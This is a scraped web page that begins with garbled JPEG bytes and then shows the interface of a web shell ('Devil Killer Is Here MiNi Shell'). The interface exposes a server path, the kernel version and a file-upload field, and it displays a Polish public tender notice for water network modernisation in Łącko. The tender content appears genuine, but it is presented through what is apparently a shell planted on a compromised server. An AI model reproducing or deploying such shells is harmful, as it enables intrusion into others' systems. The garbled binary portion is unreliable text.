JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251013/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251013/0047204201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja sieci wodociągowej w Gminie Łacko </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD GOSPODARKI KOMUNALNEJ W ŁĄCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491936095</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łącko</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łącko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-390</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi_zgk@lacko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lacko.pl/zgk.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja sieci wodociągowej w Gminie Łacko </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f09d6eb2-3586-4597-9ffd-bc813d74dede</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00472042</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00056829/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja sieci wodociągowej w Gminie Łącko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f09d6eb2-3586-4597-9ffd-bc813d74dede <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca&#34; na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4)	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem dedykowanych formularzy do komunikacji dostępnych w zakładce „Formularze&#34; („Formularze do komunikacji&#34;). Za pośrednictwem „Formularzy do komunikacji&#34; odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informację RODO zawiera pkt 17 rozdziału I SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informację RODO zawiera pkt 17 rozdziału I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGK.271.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I Modernizacja sieci wodociągowej w miejscowości Łącko (ul. Nadbrzeżna), w działce drogowej nr 783<br/><br/>Przedmiot zamówienia obejmuje przebudowę sieci wodociągowej wraz z przyłączami w miejscowości Łącko (ul. Nadbrzeżna), w działce drogowej nr 783. Prace obejmują przebudowę sieci wodociągowej metodą bezwykopową z rury PE100RC dn110 SDR11 na długości ok. 131 mb oraz wykonanie 5 przyłączy wodociągowych PE100RC dn32 SDR11 – na łącznej długości ok. 16 mb. Na każdym z 5 przyłączy oraz na włączeniu do sieci pkt D1 (wskazanym w załączniku nr 11 do SWZ) należy zamontować zasuwy o średnicy odpowiadającej średnicy rury. Przedmiot zamówienia obejmuje również wykonanie 1 hydrantu naziemnego DN80. <br/>Zakres robót obejmuje m.in.:<br/>- wykonanie robót przygotowawczych i ziemnych,<br/>- wykonanie właściwego oznakowania miejsca prowadzonych robót,<br/>- wykonanie robót montażowych,<br/>- wykonanie uzbrojenia,<br/>- wykonanie robót towarzyszących,<br/>- wykonanie robót odtworzeniowych nawierzchni, dróg i chodników,<br/>- oznaczenie zasuw i hydrantu.<br/>Przebudowywany odcinek sieci wodociągowej włączony zostanie do istniejącej sieci wodociągowej w miejscowości Łącko na dz. ew. nr 783 w obrębie budynku nr 111 (pkt D10 wskazany w załączniku nr 11 do SWZ) oraz na działce nr 783 w obrębie budynku nr 215 (pkt D1 wskazany w załączniku nr 11 do SWZ).<br/>Przebudowywany odcinek sieci wodociągowej o długości ok. 131 m i średnicy Ø 110 mm, wykonany będzie z rur PE100 RC SDR11. <br/>Przyłącza sieci wodociągowej należy wykonać z rur PE100 RC SDR11 o średnicy Ø 32 mm. Łączna długość przyłączy - ok. 16 m. <br/>Rurociągi należy wykonać na głębokości ok. 1,7 m p.p.t. W miejscach przebudowy sieci wodociągowej metodą wykopową należy zastosować taśmę znacznikową z tworzywa sztucznego z wkładką metalową, ułożoną na wysokości 40 cm – 50 cm (nad obsypką) wzdłuż osi rurociągu.<br/>Po wykonaniu rurociągu sieć wodociągowa zostanie poddana próbie ciśnienia, płukaniu i dezynfekcji rurociągu z powtórnym płukaniem. <br/>Uzbrojeniem sieci wodociągowej i przyłączy będą zasuwy odcinające z obudowami i metalowymi skrzynkami ulicznymi o średnicach DN 100 mm ÷ 25 mm dla potrzeb awaryjnego odcięcia fragmentów sieci.<br/>Dodatkowo na sieci wodociągowej zaprojektowano wykonanie hydrantu naziemnego DN80 - 1 kpl. zlokalizowany w pkt D6.1 załącznika nr 11 do SWZ. <br/>Projektowane odcinki sieci wodociągowej wykonane będą z materiałów posiadających Atest Państwowego Zakładu Higieny dopuszczający do kontaktu z wodą pitną, które należy przedłożyć Zamawiającemu.<br/>Wykonawca oznakuje miejsca zasuw i hydrantu tabliczkami zgodnymi z obowiązującymi wzorami.<br/><br/>Zamawiający dołącza Przedmiar robót stanowiący załącznik nr 10 do SWZ, mapę z zaznaczeniem przebiegu przebudowywanego odcinka sieci wodociągowej stanowiącą załącznik nr 11 do SWZ oraz STWiOR – załącznik nr 17 jako dokumenty pomocnicze. <br/>Przedmiar robót jest podstawą sporządzenia przez Wykonawcę wyceny. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym Załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy Pzp polegające na powtórzeniu podobnych robót budowlanych, których zakres i wartość nie przekroczy kwot netto – 60 690,07 PLN<br/>Zamówienie podobne będzie polegać w szczególności m.in. na wykonaniu przebudowy odcinka sieci wodociągowej wraz z przyłączami, na zasadach opisanych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>cena i okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi na cały zakres zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II Modernizacja sieci wodociągowej w miejscowości Łącko obok ZGK w Łącku na działkach 1483, 1469, 783, 2202, 2114, 777<br/><br/><br/>Przedmiot zamówienia obejmuje przebudowę sieci wodociągowej wraz z przyłączem w miejscowości Łącko obok siedziby ZGK w Łącku ( Strażacka, Nadbrzeżna) na działkach 1483, 1469, 783, 2202, 2114, 777.<br/><br/>Prace obejmują przebudowę sieci wodociągowej metodą bezwykopową z rury PE100RC dn110 SDR11 na długości ok. 166 mb, z rury PE100RC dn90 SDR11 na długości ok. 31 mb oraz wykonanie 1 przyłącza wodociągowego PE100RC dn32 SDR11 – na długości ok. 3 mb. Przedmiot zamówienia obejmuje również wykonanie montażu zasuw DN 100 – 4 szt, DN 80 – 1 szt DN 25 – 1 szt . <br/>Zakres robót obejmuje m.in.:<br/>- wykonanie robót przygotowawczych i ziemnych,<br/>- wykonanie właściwego oznakowania miejsca prowadzonych robót,<br/>- wykonanie robót montażowych,<br/>- wykonanie uzbrojenia,<br/>- wykonanie robót towarzyszących,<br/>- wykonanie robót odtworzeniowych nawierzchni, dróg i chodników,<br/>- oznaczenie zasuw.<br/>Przebudowywany odcinek sieci wodociągowej włączony zostanie do istniejącej sieci wodociągowej w miejscowości Łącko na dz. ew. nr 1483 wraz z montażem zasuwy Z1 (pkt D1 wskazany w załączniku nr 13 do SWZ) oraz na działce nr 783 wraz z montażem zasuwy Z4 (pkt D6.4 wskazany w załączniku nr 13 do SWZ), na dz. 1469 (pkt D7 wskazany w załączniku nr 13 do SWZ), na działce nr 777 wraz z montażem zasuwy Z5 (pkt D6.2 wskazany w załączniku nr 13 do SWZ) <br/>Przebudowywany odcinek sieci wodociągowej o długości ok. 166 mb i średnicy Ø 110 mm, odcinek sieci wodociągowej o średnicy Ø 90 mm o długości ok. 31 mb oraz przyłącz wodociągowy o średnicy Ø 32 mm o długości ok. 3 mb wykonane będą z rur PE100 RC SDR11.<br/>Na przebudowywanym odcinku należy zamontować łącznie 6 zasuw w tym DN 100 – 4 szt, (2 zasuwy Z1, Z4 na włączeniu do sieci oraz Z2, Z3 na trójniku do przejścia sieci wodociągowej pod ciekiem wodnym Czarna Woda - dz. 1469) i DN 80 – 1 szt ( pkt D6.2), 1 szt DN25 (pkt D.3)<br/>Rurociągi należy wykonać na głębokości ok. 1,7 m p.p.t. W miejscach przebudowy sieci wodociągowej metodą wykopową należy zastosować taśmę znacznikową z tworzywa sztucznego z wkładką metalową, ułożoną na wysokości 40 cm – 50 cm (nad obsypką) wzdłuż osi rurociągu.<br/>Po wykonaniu rurociągu sieć wodociągowa zostanie poddana próbie ciśnienia, płukaniu i dezynfekcji rurociągu z powtórnym płukaniem. <br/>Projektowane odcinki sieci wodociągowej wykonane będą z materiałów posiadających Atest Państwowego Zakładu Higieny dopuszczający do kontaktu z wodą pitną, które należy przedłożyć Zamawiającemu.<br/>Wykonawca oznakuje miejsca zasuw tabliczkami zgodnymi z obowiązującymi wzorami.<br/><br/>Zamawiający dołącza Przedmiar robót stanowiący załącznik nr 10a do SWZ, mapę z zaznaczeniem przebiegu przebudowywanego odcinka sieci wodociągowej stanowiącej załącznik nr 13 oraz STWiOR – załącznik nr 18 do SWZ jako dokumenty pomocnicze. <br/>Przedmiar robót jest podstawą sporządzenia przez Wykonawcę wyceny. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym Załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy Pzp polegające na powtórzeniu podobnych robót budowlanych, których zakres i wartość nie przekroczy kwot netto – 71 923,64 PLN <br/>Zamówienie podobne będzie polegać w szczególności m.in. na wykonaniu przebudowy odcinka sieci wodociągowej wraz z przyłączami, na zasadach opisanych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>cena i okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi na cały zakres zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III Modernizacja sieci wodociągowej w miejscowości Łącko (Garbarska) dz. 1802/6, 1808/5/ 1808/2, 1808/1, 1850/4, 1809/1, 2040, 962, 1431/1<br/><br/><br/>Przedmiot zamówienia obejmuje przebudowę sieci wodociągowej wraz z przyłączami w miejscowości Łącko (Garbarska) na działkach dz. 1802/6, 1808/5/ 1808/2, 1808/1, 1850/4, 1809/1, 2040, 962, 1431/1<br/><br/>Prace obejmują przebudowę sieci wodociągowej metodą bezwykopową z rury PE100RC dn110 SDR11 na długości ok. 182 mb, wymianę 1 kpl hydranu ppoż naziemego DN100 na działce 1802/6 oraz wykonanie 3 przyłączy wodociągowych na łącznej długości ok 8 mb z rury PE100RC dn32 SDR11 do budynków nr 423 w pkt. D3.1 (zasuwa Z4 – DN 25 i studnia wodomierzowa DN 315), nr 542 w pkt. D 5.1 (zasuwa Z3 – DN 25 i studnia wodomierzowa DN 315), nr 350 w pkt. DA.1 (zasuwa Z6- DN 25 i studnia wodomierzowa DN 315). Dodatkowo przedmiot zamówienia obejmuje montaż 3 zasuw DN 100 w punktach wskazanych w załączniku nr 15 do SWZ.<br/>Zakres robót obejmuje m.in.:<br/>- wykonanie robót przygotowawczych i ziemnych,<br/>- wykonanie właściwego oznakowania miejsca prowadzonych robót,<br/>- wykonanie robót montażowych,<br/>- wykonanie uzbrojenia,<br/>- wykonanie robót towarzyszących,<br/>- wykonanie robót odtworzeniowych nawierzchni,<br/>- oznaczenie zasuw i hydrantu.<br/>Przebudowywany odcinek sieci wodociągowej włączony zostanie do istniejącej sieci wodociągowej w miejscowości Łącko na dz. ew. nr 1802/6 wraz z montażem zasuwy Z1 (pkt D1 wskazany w załączniku nr 15 do SWZ) oraz na działce nr 1850/4 wraz z montażem zasuwy Z2 (pkt D6 wskazany w załączniku nr 15 do SWZ). Na dz. nr 2040 należy zamontować zasuwę Z5. Na działce 1802/6 zostanie wymieniony naziemny kpl hydrant ppoż DN 100.<br/>Przebudowywany odcinek sieci wodociągowej o długości ok. 182 mb i średnicy Ø 110 mm, wykonany będzie z rur PE100 RC SDR11 natomiast przyłącza sieci wodociągowej o średnicy Ø 32 mm, wykonane będą z rur PE100 RC SDR11 na łącznej długości ok 8 mb.<br/>Na przebudowywanym odcinku należy zamontować łącznie 6 zasuw w tym DN 100 – 3 szt, DN 25 – 3 szt. <br/>Rurociągi należy wykonać na głębokości ok. 1,7 m p.p.t. W miejscach przebudowy sieci wodociągowej metodą wykopową należy zastosować taśmę znacznikową z tworzywa sztucznego z wkładką metalową, ułożoną na wysokości 40 cm – 50 cm (nad obsypką) wzdłuż osi rurociągu. Po wykonaniu rurociągu sieć wodociągowa zostanie poddana próbie ciśnienia, płukaniu i dezynfekcji rurociągu z powtórnym płukaniem. <br/>Projektowane odcinki sieci wodociągowej wykonane będą z materiałów posiadających Atest Państwowego Zakładu Higieny dopuszczający do kontaktu z wodą pitną, które należy przedłożyć Zamawiającemu.<br/>Wykonawca oznakuje miejsca zasuw i hydrantu tabliczkami zgodnymi z obowiązującymi wzorami.<br/>Zamawiający dołącza Przedmiar robót stanowiący załącznik nr 10b do SWZ, mapę z zaznaczeniem przebiegu przebudowywanego odcinka sieci wodociągowej stanowiącej załącznik nr 15 oraz STWiOR – załącznik nr 19 do SWZ jako dokumenty pomocnicze. <br/>Przedmiar robót jest podstawą sporządzenia przez Wykonawcę wyceny. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym Załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-22</span></h3> <h3 